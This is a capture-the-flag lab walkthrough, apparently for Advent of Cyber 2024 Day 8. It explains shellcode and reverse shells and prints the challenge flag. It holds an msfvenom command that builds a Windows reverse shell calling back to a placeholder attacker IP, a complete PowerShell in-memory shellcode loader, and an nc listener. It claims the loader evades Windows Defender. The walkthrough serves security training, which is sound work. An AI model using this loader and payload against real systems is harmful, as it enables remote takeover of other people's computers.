Day 8

Shellcodes of the world, unite!

Welcome to Day 8 of Advent of Cyber 2024!

Today, we dive into the fascinating realm of shellcode generation and execution. In this challenge, we’ll use msfvenom to craft a reverse shell payload and help Glitch regain access by troubleshooting and executing the shellcode.

• Shellcode: A small, assembly-written piece of code used in exploits like buffer overflows to inject commands into vulnerable systems, often granting attackers control.

• Reverse Shell: A connection initiated by the target system to the attacker, allowing remote command execution. In this task, your AttackBox will act as the listener.

Lets Begin:

Open the terminal on the AttackBox and execute the following command to generate the shellcode:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell

Replace ATTACKBOX_IP with your AttackBox's IP address.

Generating script

The output will include a hex-encoded byte array, starting with values like 0xfc, 0xe8, etc. These hexadecimal numbers represent the instructions to be executed on the target machine.

Now we will use PowerShell to call a few Windows APIs via C# code. Below is a simple PowerShell script that will execute our shellcode:

# Define and add the VirtualAlloc class for memory allocation
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;

public class VrtAlloc{
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);  
}
"@

Add-Type $VrtAlloc 

# Define and add the WaitForSingleObject class for thread synchronization
$WaitFor= @"
using System;
using System.Runtime.InteropServices;

public class WaitFor{
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);   
}
"@

Add-Type $WaitFor

# Define and add the CreateThread class for thread creation
$CrtThread= @"
using System;
using System.Runtime.InteropServices;

public class CrtThread{
    [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@

Add-Type $CrtThread   

# Shellcode placeholder (replace SHELLCODE_PLACEHOLDER with actual shellcode bytes)
[Byte[]] $buf = SHELLCODE_PLACEHOLDER

# Allocate memory for the shellcode
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)

# Copy shellcode into the allocated memory
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)

# Create a new thread to execute the shellcode
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)

# Wait indefinitely for the thread to finish
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

Replace SHELLCODE_PLACEHOLDER with your shellcode byte array

Replaced with actual shellcode

On the AttackBox, start a listener to get the reverse shell connection:

 $ nc -nvlp 1111
   Listening on [0.0.0.0] (family 0, port 1111) 

Now copy, paste the script to the powershell, executing it line by line as shown below:

Powershell

Once you execute the final line in the PowerShell terminal and press Enter, you will get a reverse shell in the AttackBox, giving you complete access to the computer even if the Windows Defender is enabled.

Now you the windows powershell is in your hand, you can execute any commands like dir,type etc...

RCE

After successfully executing the shellcode and establishing a reverse shell, navigate to the glitchs' Desktop to get the flag:

type C:\Users\glitch\Desktop\flag.txt

Flag

If you need to modify the shellcode to a new IP and port (e.g., ATTACKBOX_IP and port 4444):

1. Re-run the msfvenom command with updated values:

   msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=4444 -f powershell

2. Replace the old shellcode in the PowerShell script with the updated shellcode.

Questions

1.What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt

A: AOC{GOT _MY_ACCESS_B@CK007}

Stay tuned for Day 9, and happy hacking! 🎄

Thank you!